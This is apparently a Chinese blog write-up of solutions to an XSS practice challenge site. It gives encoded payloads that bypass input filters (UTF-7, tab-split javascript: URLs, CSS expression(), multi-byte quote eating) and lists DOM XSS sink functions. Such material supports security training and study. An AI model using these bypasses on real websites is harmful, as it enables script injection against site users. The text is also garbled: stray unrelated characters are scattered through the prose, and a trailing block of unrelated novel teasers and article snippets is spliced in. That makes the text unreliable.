XSS Challenges部分題目總結(jié)
XSS Challenges:http://xss-quiz.int21h.jp/
Hint: invisible input field
用第三個(gè)參數(shù)構(gòu)造閉合語句 1"><img src=1 onerror= alert(document.domain)>
輸入<>/"發(fā)現(xiàn)<>被過濾遍坟,可以在input中構(gòu)造onxxx語句。
1" onclick="alert(document.domain)
提示:the 'javascript' scheme.
javascript:alert(document.domain)
提示:UTF-7 XSSXSS事項(xiàng) UTF-7: 消失的字符集
"<>都被轉(zhuǎn)義了,當(dāng)然也不能用onmouseover和onclick电湘,根據(jù)提示隔节,用UTF-7編碼解碼工具,將" onmousemove="alert(document.domain)轉(zhuǎn)為UTF-7編碼:p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7
提示:s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;
所以只能用a標(biāo)簽呢诬,<a href="javascript:alert(document.domain)">123</a>涌哲,可是還是有script,所以要將script中的某個(gè)字符轉(zhuǎn)為unicode編碼尚镰,或者可以插入	不可見字符阀圾。 圖片.png
%09也就是tab制表符,使用在單個(gè)標(biāo)簽之內(nèi)分俯,會(huì)被瀏覽器正確去除肾筐,而在跨標(biāo)簽的時(shí)候(也就是閉合前面原有標(biāo)簽,使用在構(gòu)造者構(gòu)造的新標(biāo)簽的時(shí)候)不會(huì)被正確去除缸剪。也僅僅是%09吗铐,其十進(jìn)制編碼和十六進(jìn)制編碼都不會(huì)受影響。后面測試發(fā)現(xiàn)%0a和%0d一樣受到影響杏节。 參考payload:"><a href=javascri	pt:alert(document.domain)>test</a> //	 tab制表符html十進(jìn)制編碼"><a href=javascri
pt:alert(document.domain)>test</a> //
是html5的換行符,:是冒號(hào) HTML的16進(jìn)制轉(zhuǎn)義符 HTML Punctuation Special Characters
提示:s/[\x00-\x20<>"']//g;
由于IE的特性染突,或者說瀏覽器競爭時(shí)代百家爭鳴導(dǎo)致的結(jié)果,會(huì)把`解析為引號(hào)辈灼。
提示:style attribute6css中的expression
xss:expr/*XSS*/ession(alert(document.domain));
還有一種:
background-color:#f00;background:url("javascript:alert(document.domain);");
現(xiàn)實(shí)環(huán)境中不可能有如此簡單就能插入的地方
@import "http://web/xss.css"
@import 'javascript:alert("xss")'
body{xss:expression(alert('xss'))]
<img style="xss:expression(alert('xss'))">
(2)css代碼中js司志,vs腳本
body{backgroud-image:url(javascript:alert('xss'))}
body{backgroud-image:url(vbscript:msgbox('xss'))}
提示:document.write();
有幾種繞過過濾的方法:
能引起Dom XSS的入口函數(shù)總結(jié)
document.write()
document.writeln()
document.body.innerHtml
eval()
window.execScript()
window.setInterval()
window.setTimeout()
提示:multi-byte character Multi-Byte Character Set & Use Unicode Character Set (瀏覽器版本問題不能成功,IE8已經(jīng)修復(fù))雙引號(hào)是0x22降宅,總體思路類似寬字節(jié)注入骂远,這個(gè)技巧在sql注入中很常用,如%0c可以吃掉一個(gè)反斜杠腰根,就是用一個(gè)特殊字節(jié)吃掉Name中的第二個(gè)"激才,然后Name和E-mail的第一個(gè)"就閉合構(gòu)成了value,然后插入onxxx额嘿,最后再吃掉最后一的"瘸恼。
抓包payloadp1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
提示:us-ascii high bit issue
就是說瀏覽器會(huì)忽略掉一些8位字符的第一位册养,如BC和<2進(jìn)制的后7位相同东帅,瀏覽器會(huì)把他當(dāng)做BC,并不會(huì)過濾球拦。(二進(jìn)制和16進(jìn)制可以和字符間相互轉(zhuǎn)換)
參考文獻(xiàn)https://blog.csdn.net/emaste_r/article/details/16988167 https://www.cnblogs.com/sherlock17/p/6700430.html
最后編輯于 :2018.04.12 19:19:04
序言:七十年代末靠闭,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子坎炼,更是在濱河造成了極大的恐慌阎毅,老刑警劉巖,帶你破解...
沈念sama 閱讀 218,284 評(píng)論 6 贊 506 序言:濱河連續(xù)發(fā)生了三起死亡事件点弯,死亡現(xiàn)場離奇詭異,居然都是意外死亡矿咕,警方通過查閱死者的電腦和手機(jī)抢肛,發(fā)現(xiàn)死者居然都...
沈念sama 閱讀 93,115 評(píng)論 3 贊 395 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來碳柱,“玉大人巡蘸,你說我怎么就攤上這事梧宫。” “怎么了?”我有些...
文/不壞的土叔 我叫張陵痊硕,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么鼓拧? 我笑而不...
正文 為了忘掉前任越妈,我火速辦了婚禮季俩,結(jié)果婚禮上阎抒,老公的妹妹穿的比我還像新娘。我一直安慰自己都哭,他們只是感情好,可當(dāng)我...
文/花漫 我一把揭開白布。 她就那樣靜靜地躺著轨淌,像睡著了一般却盘。 火紅的嫁衣襯著肌膚如雪旬陡。 梳的紋絲不亂的頭發(fā)上描孟,一...
那天孩饼,我揣著相機(jī)與錄音,去河邊找鬼竹挡。 笑死镀娶,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的揪罕。 我是一名探鬼主播梯码,決...
沈念sama 閱讀 40,309 評(píng)論 3 贊 418 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼好啰!你這毒婦竟也來了轩娶?” 一聲冷哼從身側(cè)響起,我...
序言:老撾萬榮一對情侶失蹤框往,失蹤者是張志新(化名)和其女友劉穎鳄抒,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體椰弊,經(jīng)...
沈念sama 閱讀 45,668 評(píng)論 1 贊 314 正文 獨(dú)居荒郊野嶺守林人離奇死亡嘁酿,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了男应。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
序言:一個(gè)原本活蹦亂跳的男人離奇死亡娱仔,死狀恐怖沐飘,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤耐朴,帶...
沈念sama 閱讀 35,705 評(píng)論 5 贊 347 正文 年R本政府宣布借卧,位于F島的核電站,受9級(jí)特大地震影響筛峭,放射性物質(zhì)發(fā)生泄漏铐刘。R本人自食惡果不足惜,卻給世界環(huán)境...
文/蒙蒙 一影晓、第九天 我趴在偏房一處隱蔽的房頂上張望镰吵。 院中可真熱鬧,春花似錦挂签、人聲如沸疤祭。這莊子的主人今日做“春日...
文/蒼蘭香墨 我抬頭看了看天上的太陽勺馆。三九已至,卻和暖如春侨核,著一層夾襖步出監(jiān)牢的瞬間草穆,已是汗流浹背。 一陣腳步聲響...
我被黑心中介騙來泰國打工搓译, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留悲柱,地道東北人。 一個(gè)月前我還...
沈念sama 閱讀 48,146 評(píng)論 3 贊 370 正文 我出身青樓侥衬,卻偏偏與公主長得像诗祸,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子轴总,可洞房花燭夜當(dāng)晚...
之前積累了XSS 有一段時(shí)間直颅,因?yàn)槟壳伴_始了一件有趣的工程,需要整合非常多的知識(shí)怀樟,其中Web 安全這一塊出現(xiàn)最多的...
刀背藏身 閱讀 9,060 評(píng)論 0 贊 16 在那個(gè)年代功偿,大家一般用拼接字符串的方式來構(gòu)造動(dòng)態(tài) SQL 語句創(chuàng)建應(yīng)用,于是 SQL 注入成了很流行的攻擊方式往堡。在...
在那個(gè)年代械荷,大家一般用拼接字符串的方式來構(gòu)造動(dòng)態(tài) SQL 語句創(chuàng)建應(yīng)用,于是 SQL 注入成了很流行的攻擊方式虑灰。在...
1.XSS (Cross Site Script) 吨瞎,跨站腳本攻擊 有句話說 所有的輸入都是有害的。 跨站腳本是最...
大頹寶寶 閱讀 17,195 評(píng)論 1 贊 23 對網(wǎng)站發(fā)動(dòng)XSS攻擊的方式有很多種穆咐,僅僅使用php的一些內(nèi)置過濾函數(shù)是對付不了的颤诀,即使你將filter_var,m...
